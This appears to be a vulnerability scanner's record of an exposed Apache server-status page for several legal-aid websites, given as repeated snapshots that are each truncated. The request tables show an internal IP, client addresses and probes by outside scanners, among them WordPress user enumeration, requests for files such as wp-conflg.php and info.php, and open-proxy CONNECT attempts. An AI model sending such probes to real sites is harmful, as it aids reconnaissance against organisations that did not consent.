::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00286143400.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00286143200.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82931311400.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00938451200.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15928263200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0693009326620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23930093200.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00938454700.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00938454500.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32930093210080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00938454600.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00938454400.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00938454300.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00938454200.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00938454100.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00938454000.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001397687900.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001397687800.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001397687700.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001397687600.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001397687500.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001397687400.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001397687300.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001397687200.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001397687100.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001397687000.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0013
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979db6d8247
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Friday, 14-Nov-2025 18:56:14 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 585 Parent Server MPM Generation: 584 Server uptime: 584 days 2 hours 1 minute 40 seconds Server load: 0.00 0.00 0.00 Total accesses: 13761005 - Total Traffic: 195.8 GB CPU Usage: u289.95 s24.99 cu0 cs0 - .000624% CPU load .273 requests/sec - 4164 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _______._W_..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-584155920/12/812758_ 2.3531810.00.5413477.82 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 1-584154590/48/789645_ 1.02221500.00.3513081.63 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-584154440/15/758052_ 1.481002820.00.6312944.73 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 3-584154430/50/740152_ 1.9116951850.00.4812413.55 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1763144870.961812973022460 4-584165720/56/720457_ 3.5010029870.00.8311889.25 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 5-584184060/9/699700_ 1.7341800.00.8611564.01 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 6-584154490/14/660617_ 1.14122100.00.4310901.13 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-584-0/0/635724. 0.451307900.00.0010400.22 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-584154540/82/603604_ 2.26993340.00.659810.46 130.176.137.70http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 9-5841841623/30/583693W 1.080026.60.359220.97 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 10-584184230/38/514365_ 0.6016954500.00.188751.96 130.176.187.246http/1.1atlantalegalaid.org:8080GET /favicon.ico HTTP/1.1 11-583-0/0/478724. 0.006186400.00.007901.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-583-0/0/414991. 0.007206700.00.006594.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-583-0/0/328807. 0.007206300.00.004790.17 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-583-0/0/289499. 0.434507100.00.004306.87 45.79.149.214http/1.1atlantalegalaid.org:8080\x16\x03\x01\x02 15-579-0/0/265251. 5.7940050700.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0040722000.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7831034200.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0040721400.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2740722500.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4240050900.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8740722300.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0040721700.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.963906722630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0040721600.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0043559600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0043559400.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0043559200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00267757400.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00267757200.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00267757300.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00267757100.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82912925400.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00920065100.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15909877200.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0691170716620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23911707100.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00920068600.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00920068400.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32911707110080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00920068500.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00920068300.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00920068200.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00920068100.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00920068000.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00920067900.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001379301800.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001379301700.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001379301600.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001379301500.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001379301400.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001379301300.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001379301200.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001379301100.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001379301000.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001379300900.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd979877cc0c0
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Wednesday, 12-Nov-2025 20:37:27 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 583 Parent Server MPM Generation: 582 Server uptime: 582 days 3 hours 42 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 13759805 - Total Traffic: 195.7 GB CPU Usage: u357.57 s31.22 cu0 cs0 - .000773% CPU load .274 requests/sec - 4178 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ____.W___._.._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-5823860/72/812589_ 5.2037912540.01.7513469.41 3.172.65.147http/1.1atlantalegalaid.org:8080GET /wp-cron.php HTTP/1.1 1-5823940/141/789472_ 15.1337922640.04.4713078.04 13.124.199.101http/1.1atlantalegalaid.org:8080GET /wp-content/wp-conflg.php HTTP/1.1 2-5823460/57/757967_ 8.873569240.02.5512941.27 130.176.187.246http/1.1elearning.alas.org:8080GET /login/index.php HTTP/1.1 3-5823450/114/740034_ 15.1891810.04.1012409.83 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-582-0/0/720361. 16.21379000.00.0011887.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 5-582476723/27/699646W 0.370026.60.0911561.83 130.176.208.182http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 6-5823510/37/660517_ 6.1037862660.01.5610898.78 3.172.65.148http/1.1atlantalegalaid.org:8080GET /wp-includes/widgets/ HTTP/1.1 7-58222340/101/635641_ 7.302100.02.1710398.52 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-5823640/44/603453_ 7.0537872570.02.279807.62 3.172.65.165http/1.1atlantalegalaid.org:8080GET /wp-includes/rest-api/ HTTP/1.1 9-582-0/0/583625. 0.00378600.00.009219.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-58222440/34/514298_ 5.3481800.01.818750.51 130.176.208.182http/1.1picturingjustice.org:8080GET / HTTP/1.1 11-582-0/0/478720. 0.00378500.00.007901.30 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-582-0/0/414990. 0.00378400.00.006594.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-58245850/10/328787_ 1.9337872590.00.524789.57 3.172.65.171http/1.1atlantalegalaid.org:8080GET /wp-includes/js/crop/ HTTP/1.1 14-579-0/0/289488. 3.122239452500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.7923378000.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.0024049300.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580-0/0/167742. 17.7814361500.00.002340.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-579-0/0/145444. 0.0024048700.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.2724049800.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.4223378200.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.8724049600.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.0024049000.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.962239452630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.0024048900.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.0026886900.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.0026886700.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.0026886500.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00251084800.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00251084600.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00251084700.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00251084500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82896252700.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00903392500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15893204500.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0689503456620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23895034500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00903396000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00903395800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32895034510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00903395900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00903395700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00903395600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00903395500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00903395400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00903395300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001362629100.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001362629000.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001362628900.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001362628800.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001362628700.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001362628600.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001362628500.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001362628400.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001362628300.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001362628200.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-4
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9794e72d276
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 10-Nov-2025 06:40:10 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 581 Parent Server MPM Generation: 580 Server uptime: 579 days 13 hours 45 minutes 37 seconds Server load: 0.00 0.00 0.00 Total accesses: 13756961 - Total Traffic: 195.6 GB CPU Usage: u268.43 s22.8 cu0 cs0 - .000582% CPU load .275 requests/sec - 4194 B/second - 14.9 kB/request 1 requests currently being processed, 5 idle workers __._W......_....._.............................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-580185470/0/812305_ 0.23800.00.0013457.76 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-580184080/0/789207_ 1.499082630.00.0013066.25 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 2-579-0/0/757667. 0.379084880.00.0012929.09 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1762755845.800326108932495 3-580183970/1/739697_ 0.00102700.00.3412397.99 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 4-5801840323/23/720165W 0.010026.20.0311879.30 130.176.208.143http/1.1picturingjustice.org:8080GET /server-status HTTP/1.1 5-579-0/0/699515. 0.669082740.00.0011558.82 70.132.4.80http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 6-579-0/0/660299. 0.849082570.00.0010892.04 70.132.4.80http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 7-579-0/0/635333. 0.001074700.00.0010390.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-579-0/0/603309. 0.001746500.00.009801.11 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-579-0/0/583356. 0.001746400.00.009210.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 10-579-0/0/514240. 0.001746300.00.008747.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 11-580184130/0/478538_ 2.099082630.00.007896.29 70.132.4.80http/1.1atlantalegalaid.org:8080POST /graphql/api HTTP/1.1 12-579-0/0/414971. 0.001746200.00.006593.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-579-0/0/328774. 3.211074300.00.004788.92 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-579-0/0/289488. 3.129082500.00.004306.74 70.132.4.80http/1.1atlantalegalaid.org:8080GET /info.php HTTP/1.1 15-579-0/0/265251. 5.791074400.00.003779.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-579-0/0/230468. 0.001745600.00.003442.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-580183980/1/167622_ 0.0091810.00.402337.23 130.176.208.143http/1.1picturingjustice.org:8080GET / HTTP/1.1 18-579-0/0/145444. 0.001745000.00.002064.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-579-0/0/137616. 2.271746100.00.002104.01 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-579-0/0/128299. 3.421074600.00.001823.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-579-0/0/116746. 0.871745900.00.001693.74 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-579-0/0/121137. 0.001745300.00.001644.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-579-0/0/106118. 0.969082630.00.001535.83 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api HTTP/1.1 24-579-0/0/108741. 0.001745200.00.001366.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-579-0/0/86001. 0.004583200.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-579-0/0/68645. 0.004583000.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-579-0/0/65061. 0.004582800.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00228781100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00228780900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00228781000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00228780800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82873949000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00881088800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15870900800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0687273086620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23872730800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00881092300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00881092100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32872730810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00881092200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00881092000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00881091900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00881091800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00881091700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00881091600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001340325500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001340325400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001340325300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001340325200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001340325100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001340325000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001340324900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001340324800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001340324700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001340324600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0013403245
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3148fbd97948fbd9792c1edb32
Apache Status Apache Server Status for www.picturingjustice.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 08-Nov-2025 05:43:54 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 578 Parent Server MPM Generation: 577 Server uptime: 577 days 12 hours 49 minutes 20 seconds Server load: 0.00 0.00 0.00 Total accesses: 13754451 - Total Traffic: 195.5 GB CPU Usage: u421.61 s36.15 cu0 cs0 - .000917% CPU load .276 requests/sec - 4207 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _____...__.__.W................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-577276850/152/812082_ 23.47154500.06.2513451.41 149.40.49.208http/1.1atlantalegalaid.org:8080CONNECT www.google.com:443 HTTP/1.1 1-57726290/2/789031_ 0.3515412680.00.0713060.21 173.249.217.23http/1.1 2-577275320/151/757436_ 25.92153400.06.2512920.78 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 3-577275370/274/739601_ 29.5915482540.09.1012394.08 149.40.49.208http/1.1 4-577279500/105/719925_ 22.1115452570.05.2011872.55 173.249.217.23http/1.1 5-577-0/0/699360. 26.44160100.00.0011552.20 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-577-0/0/660106. 